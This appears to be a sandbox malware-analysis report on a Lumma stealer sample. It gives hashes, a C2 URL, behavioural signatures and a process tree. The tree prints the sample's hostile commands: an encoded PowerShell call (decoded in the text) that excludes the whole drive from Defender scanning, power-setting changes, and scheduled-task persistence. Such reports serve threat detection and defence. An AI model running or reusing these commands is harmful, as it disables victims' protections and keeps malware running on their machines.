Analysis
max time kernel: 210s
max time network: 213s
platform: windows10-2004_x64
resource: win10v2004-20240704-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06-07-2024 20:29
Static task: static1
General
Target:
Size: 113.1MB
MD5: 2e3e5073d22bbcd2f2b0bfea40c95f29
SHA1: acc3917dd7d803e68475c966064bf60177934c78
SHA256: c3030eb910a9a625cd7ccfb58c831efe98db82b6e20e294d101345c24c162a2e
SHA512: bd8532d16d5e32763ae6e9f4aa1a3676226682edfab7b5a1efd132f5f76ce14a6bdf061271e02681818e1d55c1791e9e613677d6648075d1af61b51a4f5176e3
SSDEEP: 98304:jzGfaIjrga+OQlJMHIu5LKoo2A5FEtHU53KW1avHpgAE6H3ei3AaUi:QjP+OQlmyEUJ1avHe56XLAaU

Malware Config
Extracted
Family: lumma
C2: https://answerrsdo.shop/api
Signatures

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation | 8CSO1S7HME9QSJ9OS.exe

Executes dropped EXE (9 IoCs)
Processes:
pid | process
4980 | 8CSO1S7HME9QSJ9OS.exe
1576 | 7z.exe
5004 | 7z.exe
5044 | 7z.exe
4364 | 7z.exe
4140 | 7z.exe
3184 | 7z.exe
2616 | 7z.exe
2068 | Installer.exe

Loads dropped DLL (7 IoCs)
Processes:
pid | process
1576 | 7z.exe
5004 | 7z.exe
5044 | 7z.exe
4364 | 7z.exe
4140 | 7z.exe
3184 | 7z.exe
2616 | 7z.exe

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
Power Settings (1 TTP, 6 IoCs)
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
pid | process
1712 | powercfg.exe
5012 | cmd.exe
2928 | powercfg.exe
2960 | powercfg.exe
1428 | powercfg.exe
1448 | powercfg.exe

Suspicious use of SetThreadContext (1 IoC)
Processes:
description | pid | process | target process
PID 1032 set thread context of 2028 | 1032 | [email protected] | BitLockerToGo.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

Modifies registry class (3 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2480455240-981575606-1030659066-1000\{A6B388ED-B9D8-49D1-8E12-343D8F3C4C19} | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings | OpenWith.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
636 | schtasks.exe
5080 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (27 IoCs)
Processes (pid | process | entries, in recorded order):
2028 | BitLockerToGo.exe | 4
2068 | Installer.exe | 1
2200 | powershell.exe | 2
2068 | Installer.exe | 6
2056 | msedge.exe | 2
3784 | msedge.exe | 2
3536 | identity_helper.exe | 2
1440 | msedge.exe | 2
2168 | msedge.exe | 4
4404 | msedge.exe | 2

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
Processes:
pid | process
5356 | OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (29 IoCs)
Processes:
pid | process | entries
3784 | msedge.exe | 29

Suspicious use of AdjustPrivilegeToken (45 IoCs)
Processes (tokens listed in recorded order per process):
Token | pid | process
SeDebugPrivilege | 1032 | [email protected]
SeRestorePrivilege, 35, SeSecurityPrivilege, SeSecurityPrivilege | 1576 | 7z.exe
SeRestorePrivilege, 35, SeSecurityPrivilege, SeSecurityPrivilege | 5004 | 7z.exe
SeRestorePrivilege, 35, SeSecurityPrivilege, SeSecurityPrivilege | 5044 | 7z.exe
SeRestorePrivilege, 35, SeSecurityPrivilege, SeSecurityPrivilege | 4364 | 7z.exe
SeRestorePrivilege, 35, SeSecurityPrivilege, SeSecurityPrivilege | 4140 | 7z.exe
SeRestorePrivilege, 35, SeSecurityPrivilege, SeSecurityPrivilege | 3184 | 7z.exe
SeRestorePrivilege, 35, SeSecurityPrivilege, SeSecurityPrivilege | 2616 | 7z.exe
SeDebugPrivilege | 2068 | Installer.exe
SeDebugPrivilege | 2200 | powershell.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege | 2928 | powercfg.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege | 2960 | powercfg.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege | 1428 | powercfg.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege | 1448 | powercfg.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeCreatePagefilePrivilege | 1712 | powercfg.exe
33, SeIncBasePriorityPrivilege | 384 | AUDIODG.EXE

Suspicious use of FindShellTrayWindow (64 IoCs)
Processes:
pid | process | entries
3784 | msedge.exe | 64

Suspicious use of SendNotifyMessage (26 IoCs)
Processes:
pid | process | entries
3784 | msedge.exe | 26

Suspicious use of SetWindowsHookEx (15 IoCs)
Processes:
pid | process | entries
5356 | OpenWith.exe | 15

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source pid/process -> target pid/process | entries, in recorded order):
1032 [email protected] -> 2028 BitLockerToGo.exe | 5
2028 BitLockerToGo.exe -> 4980 8CSO1S7HME9QSJ9OS.exe | 3
4980 8CSO1S7HME9QSJ9OS.exe -> 3320 cmd.exe | 2
3320 cmd.exe -> 3636 mode.com | 2
3320 cmd.exe -> 1576 7z.exe | 2
3320 cmd.exe -> 5004 7z.exe | 2
3320 cmd.exe -> 5044 7z.exe | 2
3320 cmd.exe -> 4364 7z.exe | 2
3320 cmd.exe -> 4140 7z.exe | 2
3320 cmd.exe -> 3184 7z.exe | 2
3320 cmd.exe -> 2616 7z.exe | 2
3320 cmd.exe -> 5116 attrib.exe | 2
3320 cmd.exe -> 2068 Installer.exe | 3
2068 Installer.exe -> 5012 cmd.exe | 3
5012 cmd.exe -> 2200 powershell.exe | 3
2068 Installer.exe -> 1332 cmd.exe | 3
2068 Installer.exe -> 3280 cmd.exe | 3
5012 cmd.exe -> 2928 powercfg.exe | 3
1332 cmd.exe -> 636 schtasks.exe | 3
3280 cmd.exe -> 5080 schtasks.exe | 3
5012 cmd.exe -> 2960 powercfg.exe | 3
5012 cmd.exe -> 1428 powercfg.exe | 3
5012 cmd.exe -> 1448 powercfg.exe | 3
5012 cmd.exe -> 1712 powercfg.exe | 3

Views/modifies file attributes (1 TTP, 1 IoC)
Processes
(process tree; the number in brackets is the depth in the tree, as recorded by the sandbox)

[1] C:\Users\Admin\AppData\Local\Temp\[email protected] (PID 1032)
    Command line: "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe (PID 2028)
      Command line: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\8CSO1S7HME9QSJ9OS.exe (PID 4980)
        Command line: "C:\Users\Admin\AppData\Local\Temp\8CSO1S7HME9QSJ9OS.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe (PID 3320)
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\mode.com (PID 3636)
            Command line: mode 65,10
        [5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe (PID 1576)
            Command line: 7z.exe e file.zip -p1404753551733818025492326517 -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe (PID 5004)
            Command line: 7z.exe e extracted/file_6.zip -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe (PID 5044)
            Command line: 7z.exe e extracted/file_5.zip -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe (PID 4364)
            Command line: 7z.exe e extracted/file_4.zip -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe (PID 4140)
            Command line: 7z.exe e extracted/file_3.zip -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe (PID 3184)
            Command line: 7z.exe e extracted/file_2.zip -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe (PID 2616)
            Command line: 7z.exe e extracted/file_1.zip -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\attrib.exe (PID 5116)
            Command line: attrib +H "Installer.exe"
            - Views/modifies file attributes
        [5] C:\Users\Admin\AppData\Local\Temp\main\Installer.exe (PID 2068)
            Command line: "Installer.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\cmd.exe (PID 5012)
              Command line: "cmd.exe" /C powershell -EncodedCommand "PAAjAEsANgBXADMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBMAG8ATwAwAE4ASgBKACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFoAUgBmADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbgBWAEgAVQAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
              - Power Settings
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2200)
                Command line: powershell -EncodedCommand "PAAjAEsANgBXADMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBMAG8ATwAwAE4ASgBKACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFoAUgBmADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbgBWAEgAVQAjAD4A"
                Decoded -EncodedCommand (UTF-16LE base64, decoded by the editor from the value above): <#K6W3#> Add-MpPreference <#LoO0NJJ#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#ZRf5#> -Force <#nVHU#>
                The junk <#...#> block comments only pad the command; the effective call adds the whole user profile and system drive as Microsoft Defender exclusion paths.
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\powercfg.exe (PID 2928)
                Command line: powercfg /x -hibernate-timeout-ac 0
                - Power Settings
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\powercfg.exe (PID 2960)
                Command line: powercfg /x -hibernate-timeout-dc 0
                - Power Settings
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\powercfg.exe (PID 1428)
                Command line: powercfg /x -standby-timeout-ac 0
                - Power Settings
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\powercfg.exe (PID 1448)
                Command line: powercfg /x -standby-timeout-dc 0
                - Power Settings
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\powercfg.exe (PID 1712)
                Command line: powercfg /hibernate off
                - Power Settings
                - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\cmd.exe (PID 1332)
              Command line: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\SysWOW64\schtasks.exe (PID 636)
                Command line: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                - Scheduled Task/Job: Scheduled Task
          [6] C:\Windows\SysWOW64\cmd.exe (PID 3280)
              Command line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3131" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\SysWOW64\schtasks.exe (PID 5080)
                Command line: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3131" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                - Scheduled Task/Job: Scheduled Task
[1] C:\Windows\System32\rundll32.exe (PID 4828)
    Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

[1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3784)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2500)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe38b746f8,0x7ffe38b74708,0x7ffe38b74718
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3736)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2056)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4120)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3884)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 916)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2960)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2936)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 2828)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 3536)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1960)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5000)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1664)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5248 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1440)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4024 /prefetch:8
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1980)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3572)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4744)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 116)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4520)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3444)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4496)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 760)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5164 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 684)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3724)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4852)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5832)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5984)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5492)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5624)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5800)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5948)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7380 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6068)
